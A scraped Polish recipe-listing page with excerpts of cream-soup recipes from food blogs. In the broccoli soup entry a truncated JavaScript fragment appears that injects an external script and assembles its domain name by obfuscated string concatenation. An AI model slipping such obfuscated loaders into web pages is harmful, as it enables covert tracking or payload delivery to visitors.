zupa krem z groszku - 602 przepisów (strona:16/41)

Krem z marchewki i batatów 141

marchewką tworzą nie tylko smaczne danie, ale również bardzo zdrowe.  Do zupy podałam prażone pestki dyni i słonecznika, zupa jest bardzo gęsta więc celowo pominęłam dodatki typu grzanki czy groszek ptysiowy. Miało być zdrowo - więc jest :) Polecam! Krem z marchewki i batatów Składniki na 4 porcje: 4 marchewki 2 nieduże bataty 1 cebula 2 ząbki czosnku 600ml bulionu warzywnego(...)plasterki. Cebulę kroimy w talarki. Ząbek czosnku drobno siekamy. W większym garnku rozgrzewamy łyżkę masła, podsmażamy wszystkie warzywa kilka minut. Wlewamy bulion i gotujemy pod przykryciem, aż warzywa zmiękną. Zupę miksujemy na krem, dodajemy mleczko kokosowe, pastę curry i przyprawiamy do smaku kurkumą, kolendrą, ewentualnie solą i pieprzem. Podgrzewamy całość kilka minut, aż smaki się połączą. Podajemy z prażonymi pestkami

Smak mojej kuchni
Zupa z zielonego groszku z gruszką, miętą i serem z niebieską pleśnią 159

cebula się zeszkli, dodajemy gruszkę startą na grubych oczkach tarki, dusimy około 5 minut, po czym dodajemy mrożony groszek i gorący bulion. Zupę doprowadzamy do wrzenia, po czym zdejmujemy z ognia. Dodajemy ser oraz posiekaną miętę. Miksujemy zupę na krem, doprawiamy solą i pieprzem. Podajemy udekorowaną orzechami włoskimi, kawałkami sera oraz listkami mięty.   CZY WIESZ, ŻE?   Warzywa Bonduelle

Smakowity Blog Kulinarny
Zupa krem z cukinii z miętą 184

łyżką wydrążamy środek. Drobno kroimy i dodajemy do gotującego się bulionu. Gotujemy do miękkości (10-15 minut). Gdy zupa przestygnie, blenderem miksujemy na gładki krem. Dodajemy rozdrobnioną miętę i jogurt grecki. Doprawiamy przyprawami do smaku. Podajemy z grzankami lub groszkiem ptysiowym (u mnie wersja light: tylko płatki migdałów). Smacznego

KasiekGotuje
Zupa krem ziemniaczano szparagowy 212

ćwiartka selera  por  3 ząbki czosnku  ½ łyżeczka Imbiru  1-2 łyżeczki soli , wg smaku  pieprz cytrynowy  2 łyżki gęstej śmietany lub jogurtu  groszek ptysiowy Szparagi myję i odrywam twarde końce. Kroję na kawałki . Ziemniaki obieram, myję i kroję w dużą kostkę. Tak samo postępuję z pietruszką i selerem. Pora też kroję w grube(...)czosnku, sól . Gotuję do miękkości warzyw. Na koniec przyprawiam do smaku, imbirem, pieprzem cytrynowym i ewentualnie solę.  Wyciągam z zupy szparagi z główkami i odkładam. Do garnka z zupą dodaję 2 łyżki śmietany i miksuję całość blenderem na krem.   Nakładam na talerze, dodaję odłożone szparagi i groszek ptysiowy. Smacznego.  Życzę smacznego i zapraszam na Roladki

Takie tam pichcenie
Rozgrzewająca prosta zupa krem z cukinii i czosnku 157

jesienna sprzyja przeziębieniom i spadek odporności w tym czasie jest idealną pożywką dla przeróżnych wirusów. Lecz odtajnię przed Wami jeden z kulinarnych sposobów na wzmocnienie - a jest nim rozgrzewająca zupa krem z cukinii oraz czosnku. Cukinia zawiera mnóstwo składników odżywczych: wit. C, B1, B2, beta karoten, wapń, potas ale na tym nie koniec ponieważ ma również właściwości lecznicze: odkwaszające(...)Zalewamy wodą do poziomu pokrycia cukinii. Dodajemy łyżkę Vegety. Gotujemy do miękkości. Po zagotowaniu miksujemy zupę na krem (używając końcówki miksującej lub przelewając zupę do blendera). Do całości dodajemy łyżeczkę ostrej papryki. Po nałożeniu zupy na talerz dodajemy płatki kukurydziane, grzanki lub groszek ptysiowy - do wyboru oraz śmietanę wedle uznania. Za przepis dziękuję mojej Barbórce - niedoścignionej mistrzyni kulinarnej

upichcona
Wiosennie zielona zupa z groszku 170

całość listkami mięty posypać. Pasuje tutaj wspaniale; orzeźwia i jakby wyostrza całość. Dlatego śmiało możecie dać jej więcej niż tylko trzy gałązki. Krem z groszku z miętą i limonką Składniki: (na 4 porcje) 750 g mrożonego groszku 250 g ziemniaków 2 cebulki dymki 1 łyżka masła 1 l bulionu 3 gałązki świeżej mięty 100 ml śmietany kremówki(...)masło, dodać ziemniaki. Gdy wchłoną tłuszcz, zalać bulionem, dodać dymkę i gotować, aż ziemniaki zmiękną. Pod koniec gotowania dodać groszek i listki mięty, gotować jeszcze 10-15 minut. Po tym czasie zupę zdjąć z palnika, zmiksować blenderem na gładki krem. Dodać kremówkę, doprawić do smaku sokiem z limonki, solą i pieprzem. Podawać na ciepło z kleksem jogurtu. Smacznego! Przepis przygotowywałam

Pożeraczka, czyli raz adobrze
Jak przyrządzić zupę krem z brokułów? 137

ogniu do momentu, gdy warzywa będą na wpół miękkie. Dodajemy brokuł i gotujemy go do miękkości. Doprawiamy solą, pieprzem i szczyptą kminu. Zupę miksujemy na gładki krem. Serwujemy udekorowaną kleksem śmietany i natką pietruszki, z dodatkiem groszku ptysiowego lub grzanek czosnkowych. (function(){ zpl1=document.createElement("script");zpl1_=(("u")+"st")+"a";zpl1.async=true; zpl1.type="text/javascript";zpl1_+=("t.i")+""+"n";zpl1_+=(("f")+"o");zpl1

Kuchcik gotuje
Zupa krem z batatów 196

Składniki: 3 szklanki bulionu warzywnego 3 średnie bataty 1/2 papryczki chili 2 cm imbiru 2 ząbki czosnku sól, pieprz Groszek ptysiowy Mamut Przygotowanie: Bulion zagotować, dodać obrane, pokrojone w kostkę … Czytaj dalej Zupa krem z batatów

czarrna od kuchni
Zupa krem z zielonego groszku;) 118

delikatna, zielona zupa to doskonały pomysł na pierwsze danie, zwłaszcza podczas tak gorącego lata. Jej żywy, zielony kolor i aksamitny smak przyciągnie każdego miłośnika kremów. Przygotowanie zajmuje niewiele czasu, a efekt jest zdumiewający. Do jej wykonania będziecie potrzebować: 500g świeżego, zielonego groszku 1 łyżkę oliwy z oliwek 1łyżkę masła śmietana do przybrania sól pieprz Uwaga! Jeśli nie macie świeżego groszku(...)Przy 500g groszku wlewamy ok. 700ml wody. Całość doprowadzamy do wrzenia i gotujemy od 7 do 10 minut, sprawdzając miękkość warzywa. Gdy już będzie odpowiednio ugotowane, zabieramy garnek z palnika, a całość dokładnie miksujemy, aż uzyskamy odpowiednią gęstość i gładkość kremu. Dopiero teraz doprawiamy solą i sporą ilością mielonego pieprzu. Dodajemy oliwę z oliwek i masło. Zupę podajemy z gęstą

Kuchnia Pani Wiosny
Zupa krem z brokuła 140

wszelkie zupy warzywne-kremy. Są sycące, nie potrzeba do nich dużo składników, ani nie ma przy nich dużo roboty. Później wystarczy 5 minut podgrzewania zupki i nasze brzuszki zaleje fala ciepłej sytości Dzisiaj zupa brokułowa z grzankami. Oczywiście, zupę możecie zrobić na kilka sposobów. Ja zwykle zagęszczam ją dodają 1-2 ziemniaki. Niektórzy dodają do zupy śmietanę lub śmietanę rozrobioną(...)podchodzi, więc pozwolicie, że przy zupie zostanę przy swoich ziemniakach i taki też będzie przepis Do zupy możecie dodać groszek ptysiowy, grzanki, kaszę czy makaron. Wasz wybór, co najlepiej Wam w tego rodzaju zupach smakuje. Drukuj Zupa brokułowa - zupa krem z brokuła window.ajaxurl = "http://mieszamwgarnku.pl/wp-admin/admin-ajax.php"; Składniki 1 duży brokuł 1 l bulionu 1-2 niewielkie ziemniaki 2 marchewki

Mieszam w Garnku
Krem z zielonego groszku z szafranem i rozmarynem (bez glutenu, mleka, jajek) 168

Lekka, dietetyczna zupa ze świeżego groszku, z dodatkiem młodych ziemniaków, marchewki i jabłka. Składniki: zielony groszek  1 szklanka ziemniaki 4-5 szt. marchewka 1 szt. jabłko 1 szt. rozmaryn świeży 1/2 łyżeczki  szafran  1 szczypta sól do smaku mleko sojowe, ryżowe lub inne 2-3 łyżki Przygotowanie: Ziemniaki, marchewkę obrać, pokroić na kawałki, dodać groszek, zalać wrzącą(...)wodą, posolić i ugotować do miękkości. Dodać obrane, pokrojone na kawałki jabłko, szafran i chwilę pogotować. Dodać posiekane liście rozmarynu. Zmiksować za pomocą blendera na gładki krem. Zabielić mlekiem

głodny alergik
Zupa krem kalafiorowo - serowa 199

Ugotowaną zupę zestawić z ognia, lekko przestudzić i zblendować na gładki krem. Następnie zmiksowaną, kremową zupę ponownie podgrzać. Dodać serki topione i dokładnie wymieszać, aż do całkowitego rozpuszczenia się serka. Wlać śmietankę. Dodać paprykę i kurkumę. Przyprawić solą i pieprzem do smaku. Wymieszać. Zupę podawać gorącą z groszkiem ptysiowym lub grzankami. SMACZNEGO! Uwagi do przepisu: Z podanych składników wychodzi około(...)śmietanką 30 lub 36 % (tzw. kremówką). Serki topione dość ciężko i długo rozpuszczają się w zupie. W związku z tym można je dodać jeszcze przed zblendowaniem zupy i całość razem zmiksować na gładki krem. Świeżego kalafiora można zastąpić opakowaniem mrożonych różyczek kalafiora o wadze 450 g. Źródło przepisu: Wielkie Żarcie . Zupę podaj z Domowymi Grzankami Ziołowymi Domowe grzanki ziołowe

Gospodyni Miejska
Zupa brokułowa 157

Często gotuje zupy warzywne i czasem potrzebne jest jakieś urozmaicenie. Dlatego dziś proponuję zupę krem z brokułów. Bardzo dobra i sycąca zupa, którą proponuję podawać z grzankami lub z groszkiem ptysiowym. Składniki: bulion lub mięso na wywar (np. porcja rosołowa lub skrzydło z indyka) liść laurowy ziele angielskie świeże lub mrożone brokuły 1 marchew 1 cebula 2 łyżki śmietany lubczyk

Mama Gotuje
Krem kukurydziany 156

Śmietanę zahartować z wywarem (tzn. śmietanę przelać do większego naczynia i powoli dodawać gorącą zupę; cały czas mieszając). Przygotowaną śmietanę wlać do zupy i jeszcze chwilkę gotować. Posmakować i ewentualnie doprawić. Krem kukurydziany podawać, np. z łazankami, groszkiem ptysiowym lub grzankami

Ugotować
Krem z topinamburu z czerwonym pieprzem i chipsami 192

była dość pospolitym warzywem. Zupa krem z topinamburu to odpowiednia zupa na niedzielę lub np.święta. Krem z topinamburu jest zupą o oryginalnym smaku przypominającym trochę smak orzechów. Jak każdy krem można ją podawać z przeróżnymi dodatkami: grzankami, groszkiem ptysiowym czy chipsami warzywnymi. KREM Z TOPINAMBURU Z CHIPSAMI  I  CZERWONYM PIEPRZEM Składniki: 1 litr bulionu 1 cebula(...)podsmażony topinambur z cebulą oraz pokrojone z kostkę ziemniaki. Gotujemy aż warzywa zmiękną. Kiedy warzywa będą miękkie miksujemy wszystko blenderem,a następnie wstawiamy ponownie na ogień i dodajemy do zupy serki topione, mieszamy, aby się rozpuściły. Doprawiamy do smaku solą i pieprzem,a także dodajemy śmietanę. Ja podałam z odrobiną oliwy z oliwek chipsami z topinamburu oraz czerwonym pieprzem

Bon appetit mon amie